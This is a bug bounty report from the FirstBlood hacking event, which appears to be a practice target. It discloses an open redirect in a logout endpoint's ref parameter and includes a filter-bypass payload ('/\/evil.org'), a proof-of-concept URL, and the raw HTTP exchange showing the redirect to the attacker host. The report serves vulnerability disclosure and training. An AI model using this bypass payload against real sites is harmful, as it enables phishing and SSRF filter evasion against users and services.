FirstBlood-#92Open redirect at http://firstbloodhackers.com:49330/drpanel/logout.php



On 2021-05-10, 0xconft reported:

Hi there,

I found an open redirect on your website at /drpanel/logout.php endpoint on ref parameter. There's filter in place where it must start with / and also // is filtered but i end up bypassing this with this payload "/\/evil.org" which will be reflected as "//evil.org" at location header thus will redirect victim to evil.org. An example of impact caused by this vulnerability is this vulnerability can be combined with SSRF attack to bypassing filter or it can be used for phising.

PoC

http://firstbloodhackers.com:49330/drpanel/logout.php?ref=/\/evil.org

Request

GET /drpanel/logout.php?ref=/\/evil.org HTTP/1.1
Host: firstbloodhackers.com:49330
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate  
Connection: close
Referer: http://firstbloodhackers.com:49330/drpanel/index.php
Cookie: drps=5a5cfb7c6047d6dc8dbc411b2
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 10 May 2021 06:19:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: //evil.org
Content-Length: 0

P4 Low

Endpoint: /drpanel/logout.php

Parameter: ref

Payload: /\/evil.org


FirstBlood ID: 1
Vulnerability Type: Open Redirect

There is an open url redirect vulnerability on /logout.php. The code expects it to start with / and does not allow to redirect to external domains but this can be bypassed.


Respect Earnt: 1000000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.